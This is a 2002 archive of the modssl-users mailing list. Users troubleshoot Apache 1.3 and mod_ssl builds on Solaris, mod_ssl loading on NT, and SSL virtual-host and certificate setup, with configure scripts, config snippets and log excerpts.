In-reply-to: Your message of "Thu, 18 Jul 2002 10:50:05 +0200."
             <14D1193E30E0894D8A773957C0AEE24AAA91F1@SOMEXEVS001.ex.ordersx.org> 
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Date: Thu, 18 Jul 2002 11:17:17 +0200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Georg Oppenberg 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I compiled this combination with gcc 2.95.2 (compiled by myself with 
help of sunfreeware gcc) on Solaris 8 without special changes. After 
examining some sunfreeware PKGs I decided to roll everything on my own.

Cheers
	Georg

UUNET - a WorldCom Company
UUNET Deutschland GmbH
Sebrathweg 20
44149 Dortmund
Germany

> I'm running solaris 8 and compiled apache/mod_ssl/mm/DSO with no problems *wi
> thout* SHARED_CORE... I am using gcc 3.0.3.
> 
> Rgds,
> 
> Owen Boyle
> 
> >-----Original Message-----
> >From: Steve Romero [mailto:sromero@smc.sns.slb.com]
> >Sent: Mittwoch, 17. Juli 2002 23:45
> >To: modssl-users@modssl.org; 'modssl-users@modssl.org'
> >Subject: RE: I am having a heck of a time - Please help. -- SOLUTION
> >FOUND !
> >
> >
> >David,
> >
> >yes I've encountered problems with gcc when building apache as 
> >well.  I 
> >don't know what the problem is I always thought it was a 
> >version issue.  I 
> >use a gcc-2.8.1 package from FSF, and that works.  Perhaps I 
> >should try 
> >compiling a newer version of gcc, and not use the Sunfreeware package.
> >
> >thanks for the research info below.
> >
> >Regards,
> >Steve Romero
> >
> >At 08:45 AM 7/17/2002 -0700, David Loesche wrote:
> >>Building Apache with EAPI, DSO enabled, mod_ssl and mm is a 
> >very simple
> >>task. I do not know why it took so long to figure out. You 
> >simply following
> >>the instructions in the mod_ssl install documentation (or 
> >other helpful
> >>documents you can find these all over the web), and your up 
> >and running with
> >>Apache - EAPI, DSO, mod_ssl, etc. running.
> >>
> >>WRONG!  Not on Solaris 8.  It seems that if you build Apache 
> >on Solaris 2.6
> >>with gcc 2.95 all is well.  Simply following the instructions 
> >in the mod_ssl
> >>documentation and your done.  But it's another story if you are using
> >>Solaris 8 (I am not sure about 7 or 9 - I do have time to try 
> >it on these).
> >>After many hours of frustration and numerous emails I finally 
> >decided to try
> >>every combination one-by-one to identify which one was the culprit.
> >>
> >>Initial environment:
> >>
> >>Solaris 8
> >>Gcc 3.0.3
> >>Apache 1.3.26
> >>Mod_ssl-2.8.10-1.3.26
> >>mm-1.1.3
> >>openssl-0.9.6d
> >>
> >>The only way this combination works is with 
> >-enable-rule=SHARED_CORE. This
> >>option "forces" Apache to export the share symbols so they 
> >are available at
> >>run time.  This takes a 5% performance hit and since the 
> >previous build did
> >>not have it I assumed I was doing something wrong.  So I tried every
> >>possible build configuration over and over - No change (I had 
> >to use the
> >>SHARE_CORE rule).  I even tried this on Apache 2.0.39 and 1.3.20 (the
> >>previous build version here of Apache).  No matter what I did 
> >I could not
> >>get it to build the same way as the previous version. More 
> >work to do...
> >>
> >>2nd shot:
> >>
> >>Solaris 8
> >>Gcc 2.95.3
> >>Apache 1.3.26
> >>Mod_ssl-2.8.10-1.3.26
> >>mm-1.1.3
> >>openssl-0.9.6d
> >>
> >>EVENTS AND SOLUTION:
> >>
> >>Same as above.  More work to do...
> >>
> >>Last shot:
> >>
> >>Solaris 8
> >>Gcc 3.1
> >>Apache 1.3.26
> >>Mod_ssl-2.8.10-1.3.26
> >>mm-1.1.3
> >>openssl-0.9.6d
> >>
> >>Worked just like all the documentation said it should have 
> >and everyone I
> >>contacted told me to do (which I had spend over a week 
> >reading and trying
> >>all these suggestions).  As it turns out, either the build from
> >>sunfreeware.com for gcc 2.95 & 3.0.3 have an issue with the 
> >loader module,
> >>the building of shared libraries, or gcc has an issue.  So, 
> >if any of you
> >>have to do this make sure you have gcc 3.1 or SUN's compiler 
> >(I believe
> >>SUN's works but did not try it - I guess I'm just stubborn).
> >>
> >>Later,
> >>
> >>
> >>
> >>-----Original Message-----
> >>From: David Loesche
> >>Sent: Monday, July 15, 2002 12:07 PM
> >>To: 'modssl-users@modssl.org'
> >>Subject: RE: I am having a heck of a time - Please help.
> >>
> >>I did read the referred document concerning the build phase.  
> >I am intrigued
> >>by the LD_LIBRARY_PATH suggestion.  What would you recommend 
> >I set it to?
> >>
> >>-----Original Message-----
> >>From: Boyle Owen [mailto:Owen.Boyle@swx.com]
> >>Sent: Monday, July 15, 2002 12:51 AM
> >>To: modssl-users@modssl.org
> >>Subject: RE: I am having a heck of a time - Please help.
> >>
> >>Could be to do with your version of openssl lib (check it is 
> >reasonably up
> >>to date) or with your LD_LIBRARY_PATH environment variable..
> >>
> >>Check out 
> >http://www.delouw.ch/linux/Apache-Compile-HOWTO/html/apache.html
> >>
> >>for a good user's summary.
> >>
> >>Rgds,
> >>
> >>Owen Boyle
> >>
> >> >-----Original Message-----
> >> >From: David Loesche [mailto:DLoesche@yipes.com]
> >> >Sent: Freitag, 12. Juli 2002 20:12
> >> >To: 'modssl-users@modssl.org'
> >> >Subject: I am having a heck of a time - Please help.
> >> >
> >> >
> >> >I have poured through all the documentation I can find on
> >> >enabling mod_ssl
> >> >with Apache 1.3.26 but keep coming up short.  If I static link
> >> >the mod_ssl
> >> >it works fine but when I try to enable DSO and use it as a
> >> >shared library I
> >> >keep getting ap_add_config_define : referenced symbol not
> >> >found.  I have the
> >> >following config setup for the apache build:
> >> >
> >> >#!/bin/ksh
> >> >SSL_BASE=/usr/local/ssl \
> >> >EAPI_MM=../mm-1.1.3 \
> >> >EAPI_MM_CORE_PATH=logs/httpd.mm \
> >> >LIBS=/usr/lib/libC.so.5 \
> >> >CFLAGS=-fPIC \
> >> >./configure    --prefix=/opt/apache \
> >> >               --enable-rule=EAPI \
> >> >               --enable-module=ssl \
> >> >               --enable-shared=ssl \
> >> >               --disable-rule=SSL_COMPAT \
> >> >               --enable-rule=SSL_SDBM \
> >> >               --enable-suexec \
> >> >               --suexec-caller=http
> >> >
> >> >I have followed the instructions in the modssl install 
> >guide to patch
> >> >Apache.  Please verify the following build for mod_ssl:
> >> >
> >> >./configure    --with-apache=../apache_1.3.26 \
> >> >               --with-ssl=/usr/local/ssl \
> >> >               --with-mm=../mm-1.1.3
> >> >
> >> >If you can help (point me to some documentation) I would be
> >> >very grateful...
> >> >
> >> >
> >> >David S. Loesche
> >> >david.loesche@yipes.com                        Yipes
> >> >Communications, Inc.
> >> >Main:  (415) 901-2000                  114 Sansome Street, 
> >Suite 1045
> >> >Direct:        (415) 901-2210                  San 
> >Francisco, CA 94104
> >> >Fax:   (415) 901-2201                  http://www.yipes.com
> >> >
> >> >Yipes is the defining provider of fully scalable bandwidth for
> >> >businesses.
> >> >We offer fully managed high-speed Internet and Nationwide LAN-to-LAN
> >> >services at speeds ranging from 1 Mbps to 1 Gbps, in 1 Mbps
> >> >increments.
> >> >
> >> >Yipes delivers this uniquely flexible service over the 
> >first nationwide
> >> >system of optical IP networks.
> >> >
> >> 
> >>______________________________________________________________________
> >> >Apache Interface to OpenSSL (mod_ssl)                   
> www.modssl.org
> > >User Support Mailing List                      modssl-users@modssl.org
> > >Automated List Manager                            majordomo@modssl.org
> > >
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 18 15:26:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA03345; Thu, 18 Jul 2002 15:25:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhub.AXP.MDX.AC.UK id PAA03322; Thu, 18 Jul 2002 15:25:02 +0200 (MET DST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #38636)
 id <01KK8RSZCUI80014UC@mdx.ac.uk> for modssl-users@modssl.org; Thu,
 18 Jul 2002 14:24:41 +0100 (BST)
Received: from mdx-he-staff2.nw.mdx.ac.uk
 (mdx-he-staff2.mdx.ac.uk [158.94.88.6]) by mdx.ac.uk (PMDF V6.1-1 #38636)
 with ESMTP id <01KK8RSYSQ8I0011VY@mdx.ac.uk> for modssl-users@modssl.org; Thu,
 18 Jul 2002 14:24:41 +0100 (BST)
Received: from MDX-HE-STAFF2/SpoolDir by mdx-he-staff2.nw.mdx.ac.uk
 (Mercury 1.48); Thu, 18 Jul 2002 14:20:55 +0000
Received: from SpoolDir by MDX-HE-STAFF2 (Mercury 1.48); Thu,
 18 Jul 2002 14:20:38 +0000
Received: from [1] (158.94.89.77) by mdx-he-staff2.nw.mdx.ac.uk (Mercury 1.48)
 with ESMTP; Thu, 18 Jul 2002 14:20:28 +0000
Date: Thu, 18 Jul 2002 14:20:27 +0100
From: Alex Moon 
Subject: Re: Failure to load mod_ssl under NT/apache 2.0
In-reply-to: <3D363546.7070008@sympatico.ca>
To: modssl-users@modssl.org
Message-id: 
Organization: Middlesex University
MIME-version: 1.0
X-Mailer: Pegasus Mail for Win32 (v3.12a)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Moon 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hunter and Brendan 

Thanks very much for your help.  Hunter you are a genius!! I 
couldn't have asked for a more comprehensive breakdown of the 
solution. Anyhow problem solved and mod_ssl.so now loads - 
hooray!  My test server is now configured so will now under go 
reliability testing before i put it up live.

Many thanks for your time and effort.

Alex 

On 17 Jul 02, at 23:25, hunter wrote:

> Sorry about replying to my own message.
> 
> In the event that it may be useful I have placed the entire build on 
> line -- that I made while creating my earlier instructions.
> 
> I do not feel in anyway an authority, but I have managed to get the code 
> to build and start (load).  Though I did not finish the configuration in 
> this case, nor did I make any certs.
> 
> http://tor.ath.cx/~hunter/apache/apache.zip
> 
> It is large ... pull it down if you wish to learn from it.  Use it if 
> you like ... your choice.
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org



Technical Manager
Online Learning Support Unit
Middlesex University Business School

a.moon@mdx.ac.uk
020 8411 5092

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 18 17:24:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA13619; Thu, 18 Jul 2002 17:23:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from foundationcomputing.net id RAA13600; Thu, 18 Jul 2002 17:22:50 +0200 (MET DST)
Received: from [207.160.174.25] (HELO bam)
  by foundationcomputing.net (CommuniGate Pro SMTP 3.5.8)
  with SMTP id 1431441 for modssl-users@modssl.org; Thu, 18 Jul 2002 10:12:55 -0500
Message-ID: <00e201c22e6f$c351ca00$20aea0cf@bam>
From: "Joe Dames" 
To: 
Subject: log shows connection from server,  but then can't connect from internet client
Date: Thu, 18 Jul 2002 10:28:27 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Joe Dames" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello fellow humans!


I am trying desperately to discover the new skill of installing an SSL
certificate on an Apache server which is (hopefully) SSL enabled.

.I start the server:
/usr/local/apache/bin/apachectl startssl
It starts cleanly!  (I think)
http://molions.com/joe/apache-ssl_error_log.txt

.No my problems are uncovered. I can connect to port 443 on my virtual server
while using the openssh s_client tool at my servers shell.  I cannot, however,
do a normal client connection from another machine's web browser (netscape, IE,
Opera, --all new versions).  I have read high and low, and have learned a great
deal, but still am at a loss of what is wrong.  I have compiled all of the
variables that I have found to have a direct effect upon the operation of ssl
and included them below for your expert opinions.

.I believe I have accomplished some level of success as evidenced by this
ssl_engine_log snip
http://molions.com/joe/ssl_engine_log_snip.txt
I am concerned about the whole "Init: 1st startup round (still not detached)"
bit in the ssl_engine_log.  I don't understand why it must go through 2 startup
rounds.  Is this a problem?

.When I run curl secure.mydomain.com:443 from the ssl server, it spits out all
of the html. But I am having no success having a client browser on another
machine connect to port 443 on this virtual server.

.Here is what I get when I run the command: "openssl s_client -connect
secure.mydomain.com:443 -state"
http://molions.com/joe/openssl-s_client_-connect.txt
(I've changed the names to protect the innocent ;)

.Here are my httpd.conf ssl tidbits
http://molions.com/joe/httpd.conf.tidbits.txt


.Here is some of my directory proof that the files are there and who can do what
with them
http://molions.com/joe/ssl_directory_structure.txt



If I have configured something totally wrong (I'm sure),  please tell me.  I
realize I still have so much to learn.  Any help at all will be immensely
appreciated.

Joe Dames

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 18 18:56:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA19990; Thu, 18 Jul 2002 18:55:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from foundationcomputing.net id SAA19957; Thu, 18 Jul 2002 18:54:22 +0200 (MET DST)
Received: from [207.160.174.25] (HELO bam)
  by foundationcomputing.net (CommuniGate Pro SMTP 3.5.8)
  with SMTP id 1431590 for modssl-users@modssl.org; Thu, 18 Jul 2002 11:44:26 -0500
Message-ID: <013301c22e7c$8c7d75d0$20aea0cf@bam>
From: "Joe Dames" 
To: 
References: <00e201c22e6f$c351ca00$20aea0cf@bam>
Subject: Re: log shows connection from server,  but then can't connect from internet client
Date: Thu, 18 Jul 2002 11:59:58 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Joe Dames" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Digging deeper, I realized I had overlooked an error in the "openssl s_client"
output:

verify error:num=19:self signed certificate in certificate chain

Will this help?
openssl verify -CApath /usr/local/apache/conf/ca-bundle/ -CAfile
/usr/local/apache/conf/ca-bundle/ca.txt

I'm not sure if this is what I should be doing.



----- Original Message -----
From: "Joe Dames" 
To: 
Sent: Thursday, July 18, 2002 10:28 AM
Subject: log shows connection from server, but then can't connect from internet
client


> Hello fellow humans!
>
>
> I am trying desperately to discover the new skill of installing an SSL
> certificate on an Apache server which is (hopefully) SSL enabled.
>
> .I start the server:
> /usr/local/apache/bin/apachectl startssl
> It starts cleanly!  (I think)
> http://molions.com/joe/apache-ssl_error_log.txt
>
> .No my problems are uncovered. I can connect to port 443 on my virtual server
> while using the openssh s_client tool at my servers shell.  I cannot, however,
> do a normal client connection from another machine's web browser (netscape,
IE,
> Opera, --all new versions).  I have read high and low, and have learned a
great
> deal, but still am at a loss of what is wrong.  I have compiled all of the
> variables that I have found to have a direct effect upon the operation of ssl
> and included them below for your expert opinions.
>
> .I believe I have accomplished some level of success as evidenced by this
> ssl_engine_log snip
> http://molions.com/joe/ssl_engine_log_snip.txt
> I am concerned about the whole "Init: 1st startup round (still not detached)"
> bit in the ssl_engine_log.  I don't understand why it must go through 2
startup
> rounds.  Is this a problem?
>
> .When I run curl secure.mydomain.com:443 from the ssl server, it spits out all
> of the html. But I am having no success having a client browser on another
> machine connect to port 443 on this virtual server.
>
> .Here is what I get when I run the command: "openssl s_client -connect
> secure.mydomain.com:443 -state"
> http://molions.com/joe/openssl-s_client_-connect.txt
> (I've changed the names to protect the innocent ;)
>
> .Here are my httpd.conf ssl tidbits
> http://molions.com/joe/httpd.conf.tidbits.txt
>
>
> .Here is some of my directory proof that the files are there and who can do
what
> with them
> http://molions.com/joe/ssl_directory_structure.txt
>
>
>
> If I have configured something totally wrong (I'm sure),  please tell me.  I
> realize I still have so much to learn.  Any help at all will be immensely
> appreciated.
>
> Joe Dames
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 18 23:22:40 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA08378; Thu, 18 Jul 2002 23:21:47 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from seraph3.grc.nasa.gov id XAA08277; Thu, 18 Jul 2002 23:20:56 +0200 (MET DST)
Received: from lombok-fi.lerc.nasa.gov (lombok-fi.lerc.nasa.gov [139.88.112.33])
	by seraph3.grc.nasa.gov (Postfix) with ESMTP id 2D351640C6
	for ; Thu, 18 Jul 2002 17:20:50 -0400 (EDT)
Received: from salderman.lerc.nasa.gov (salderman.lerc.nasa.gov [139.88.188.22])
	by lombok-fi.lerc.nasa.gov (NASA GRC 8.12.3/8.12.3) with ESMTP id g6ILKnBg012527
	for ; Thu, 18 Jul 2002 17:20:49 -0400 (EDT)
Received: (smalder@localhost) by salderman.lerc.nasa.gov (NASA LeRC 8.7.4.1/2.01-local)
        id RAA15652; Thu, 18 Jul 2002 17:21:14 -0400
X-Authentication-Warning: salderman.lerc.nasa.gov: smalder set sender to sean.m.alderman@grc.nasa.gov using -f
Subject: SSL w/ Virtual Hosts startup failure...
From: Sean M Alderman 
To: modssl-users@modssl.org
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.8 
Date: 18 Jul 2002 17:21:13 -0400
Message-Id: <1027027273.3212.453.camel@salderman.lerc.nasa.gov>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sean M Alderman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi, I just received certs today for a couple of Vhosts.  I setup their
SSL vhosts like -





# Server Info
ServerName www.server.com
ServerAdmin sean.m.alderman@grc.nasa.gov

# SSL Stuff
SSLEngine on
SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
SSLCertificateFile /usr/appl/www/www.server.com/certs/server.crt
SSLCertificateKeyFile /usr/appl/www/www.server.com/certs/server.key

    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars

SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0
CustomLog /usr/appl/www/cws.grc.nasa.gov/logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"

# Document Directory Information
DocumentRoot /usr/appl/www/www.server.com/htdocs

  Options +Includes


# Jakarta Mounts for the
# Bobby Section 508 software
JkMount /bobby ajp13
JkMount /bobby/*.jsp ajp13

# CGI Directories
ScriptAlias /cgi-bin/ "/usr/appl/www/www.server.com/cgi-bin/"

# Log Configuration
ErrorLog /usr/appl/www/www.server.com/logs/error_log
CustomLog "|/usr/appl/apache/bin/rotatelogs
/usr/appl/www/www.server.com/logs/access_log 2419200" combined





I configured ssl and certs for 3 vhosts and tested each one after I made
the configuration for it.  The server started after the first ssl
config, and the second, but it's not starting on the last.  The SSL
Engine Log is here, access_log and error_log have are empty

==> ssl_engine_log <==
[18/Jul/2002 17:09:30 11938] [info]  Server: Apache/1.3.26, Interface:
mod_ssl/2.8.9, Library: OpenSSL/0.9.6d
[18/Jul/2002 17:09:30 11938] [info]  Init: 1st startup round (still not
detached)
[18/Jul/2002 17:09:30 11938] [info]  Init: Initializing OpenSSL
library[18/Jul/2002 17:09:30 11938] [info]  Init: Loading certificate &
private key of SSL-aware server mailarch.grc.nasa.gov:443
[18/Jul/2002 17:09:30 11938] [info]  Init: Loading certificate & private
key of SSL-aware server cws.grc.nasa.gov:443
[18/Jul/2002 17:09:30 11938] [info]  Init: Loading certificate & private
key of SSL-aware server webapp.grc.nasa.gov:443
[18/Jul/2002 17:09:30 11938] [info]  Init: Seeding PRNG with 136 bytes
of entropy
[18/Jul/2002 17:09:30 11938] [info]  Init: Generating temporary RSA
private keys (512/1024 bits)
[18/Jul/2002 17:09:31 11938] [info]  Init: Configuring temporary DH
parameters (512/1024 bits)


Is there some advanced logging I can do to determine the problem?  Has
this been handled before (and I didn't use the right search terms)?

Thanks!

-- 
Sean M. Alderman
ITRACK Systems Analyst
PACE/NCI - NASA Glenn Research Center
(216) 433-2795

Calling a windowed operating system "Windows" is like naming an
automobile "Wheels."
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 18 23:40:31 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA09553; Thu, 18 Jul 2002 23:39:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from xchangeserver2.storigen.com id XAA09529; Thu, 18 Jul 2002 23:38:36 +0200 (MET DST)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: SSL w/ Virtual Hosts startup failure...
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Date: Thu, 18 Jul 2002 17:38:29 -0400
Message-ID: <7BFCE5F1EF28D64198522688F5449D5A844EED@xchangeserver2.storigen.com>
Thread-Topic: SSL w/ Virtual Hosts startup failure...
Thread-Index: AcIuoYqpa7dSM+vaQjOUARTydhmsiAAAYkzw
From: "Bill Adams" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id XAA09545
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Bill Adams" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You could try adding these directives inside your virtual host block (or else make the scope global if you wish):

  SSLLog /var/log/httpd/{virtual-host-name}-ssl_log
  SSLogLevel debug

These will provide some verbose debug spew in the ssl log file that might help.


-----Original Message-----
From: Sean M Alderman [mailto:sean.m.alderman@grc.nasa.gov]
Sent: Thursday, July 18, 2002 5:21 PM
To: modssl-users@modssl.org
Subject: SSL w/ Virtual Hosts startup failure...


Hi, I just received certs today for a couple of Vhosts.  I setup their
SSL vhosts like -





# Server Info
ServerName www.server.com
ServerAdmin sean.m.alderman@grc.nasa.gov

# SSL Stuff
SSLEngine on
SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
SSLCertificateFile /usr/appl/www/www.server.com/certs/server.crt
SSLCertificateKeyFile /usr/appl/www/www.server.com/certs/server.key

    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars

SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0
CustomLog /usr/appl/www/cws.grc.nasa.gov/logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"

# Document Directory Information
DocumentRoot /usr/appl/www/www.server.com/htdocs

  Options +Includes


# Jakarta Mounts for the
# Bobby Section 508 software
JkMount /bobby ajp13
JkMount /bobby/*.jsp ajp13

# CGI Directories
ScriptAlias /cgi-bin/ "/usr/appl/www/www.server.com/cgi-bin/"

# Log Configuration
ErrorLog /usr/appl/www/www.server.com/logs/error_log
CustomLog "|/usr/appl/apache/bin/rotatelogs
/usr/appl/www/www.server.com/logs/access_log 2419200" combined





I configured ssl and certs for 3 vhosts and tested each one after I made
the configuration for it.  The server started after the first ssl
config, and the second, but it's not starting on the last.  The SSL
Engine Log is here, access_log and error_log have are empty

==> ssl_engine_log <==
[18/Jul/2002 17:09:30 11938] [info]  Server: Apache/1.3.26, Interface:
mod_ssl/2.8.9, Library: OpenSSL/0.9.6d
[18/Jul/2002 17:09:30 11938] [info]  Init: 1st startup round (still not
detached)
[18/Jul/2002 17:09:30 11938] [info]  Init: Initializing OpenSSL
library[18/Jul/2002 17:09:30 11938] [info]  Init: Loading certificate &
private key of SSL-aware server mailarch.grc.nasa.gov:443
[18/Jul/2002 17:09:30 11938] [info]  Init: Loading certificate & private
key of SSL-aware server cws.grc.nasa.gov:443
[18/Jul/2002 17:09:30 11938] [info]  Init: Loading certificate & private
key of SSL-aware server webapp.grc.nasa.gov:443
[18/Jul/2002 17:09:30 11938] [info]  Init: Seeding PRNG with 136 bytes
of entropy
[18/Jul/2002 17:09:30 11938] [info]  Init: Generating temporary RSA
private keys (512/1024 bits)
[18/Jul/2002 17:09:31 11938] [info]  Init: Configuring temporary DH
parameters (512/1024 bits)


Is there some advanced logging I can do to determine the problem?  Has
this been handled before (and I didn't use the right search terms)?

Thanks!

-- 
Sean M. Alderman
ITRACK Systems Analyst
PACE/NCI - NASA Glenn Research Center
(216) 433-2795

Calling a windowed operating system "Windows" is like naming an
automobile "Wheels."
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 18 23:43:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA09742; Thu, 18 Jul 2002 23:42:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from rapidash.its.hawaii.edu id XAA09708; Thu, 18 Jul 2002 23:42:01 +0200 (MET DST)
Received: from conversion-daemon.mail.hawaii.edu by mail.hawaii.edu
 (iPlanet Messaging Server 5.1 HotFix 0.9 (built May 30 2002))
 id <0GZG00F01RTFBR@mail.hawaii.edu>; Thu, 18 Jul 2002 11:41:54 -1000 (HST)
Received: from GOREDSOX (portcullis.uhh.hawaii.edu [128.171.13.235])
 by mail.hawaii.edu
 (iPlanet Messaging Server 5.1 HotFix 0.9 (built May 30 2002))
 with SMTP id <0GZG00I8QS9PNK@mail.hawaii.edu>; Thu,
 18 Jul 2002 11:41:50 -1000 (HST)
Date: Thu, 18 Jul 2002 11:41:48 -1000
From: Carl Dionne 
Subject: https setup on Redhat Linux 7.3 usig apache webserver
In-reply-to: <1027027273.3212.453.camel@salderman.lerc.nasa.gov>
To: modssl-users@modssl.org
Message-id: <002101c22ea3$ec0172a0$cc2a2a0a@uhhcsdept.int>
MIME-version: 1.0
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0)
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7bit
Importance: Normal
X-Priority: 3 (Normal)
X-MSMail-priority: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Carl Dionne 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

I am new to the mailing list.  I have several redhat 7.3 linux servers that
are running Apache 1.3 webservers.  Can anyone point me to a guide to setup
the following:

1.  Running a webserver using standard http
2.  and, setting up a sub area using a virtual host to allow access only
through https.

I must be missing something.  I have verified that port 443 is active and
listening.  However I loose it when trying to get the web page to work with
SSL using https instead of http.

Has anyone done this before.  I successfully got squirrelmail running but we
want to use SSL for security reasons.

Mahalo

Carl Dionne
UHH Computer Science

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 19 00:43:22 2002
